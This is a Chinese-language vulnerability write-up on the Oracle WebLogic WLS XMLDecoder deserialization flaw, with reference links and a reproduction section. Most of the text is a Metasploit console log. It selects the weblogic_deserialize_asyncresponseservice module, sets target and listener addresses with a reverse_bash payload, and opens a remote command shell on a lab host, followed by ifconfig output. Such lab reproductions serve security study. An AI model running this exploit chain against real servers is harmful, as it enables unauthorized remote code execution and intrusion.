Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
参考链接:
https://www.exploit-db.com/exploits/43458/
https://paper.seebug.org/487/
https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic%20WLS-WebServices组件反序列化漏洞分析.md
http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
漏洞复现:
msf5 > search weblogic_deserialize_asyncresponseservice Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/misc/weblogic_deserialize_asyncresponseservice 2019-04-23 excellent Yes Oracle Weblogic Server Deserialization RCE - AsyncResponseService msf5 > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show options Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 7001 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /_async/AsyncResponseService yes URL to AsyncResponseService VHOST no HTTP server virtual host Payload options (cmd/unix/reverse_bash): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Unix msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set rhosts 192.168.3.5 rhosts => 192.168.3.5 msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.0.14 lhost => 192.168.0.14 msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit [*] Started reverse TCP handler on 192.168.0.14:4444 [*] Generating payload... [*] Sending payload... [*] Command shell session 1 opened (192.168.0.14:4444 -> 192.168.3.5:56352) at 2020-03-09 09:03:21 +0800 ifconfig eth0 Link encap:Ethernet HWaddr 02:42:ac:19:00:02 inet addr:172.25.0.2 Bcast:172.25.255.255 Mask:255.255.0.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:368 errors:0 dropped:0 overruns:0 frame:0 TX packets:315 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:53275 (53.2 KB) TX bytes:157223 (157.2 KB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:12 errors:0 dropped:0 overruns:0 frame:0 TX packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:628 (628.0 B) TX bytes:628 (628.0 B)
其他资料:
https://cvedetails.com/cve/CVE-2017-10271/CNVD-C (2019-48814)
http://www.cnvd.org.cn/webinfo/show/4999
https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
https://twitter.com/F5Labs/status/1120822404568244224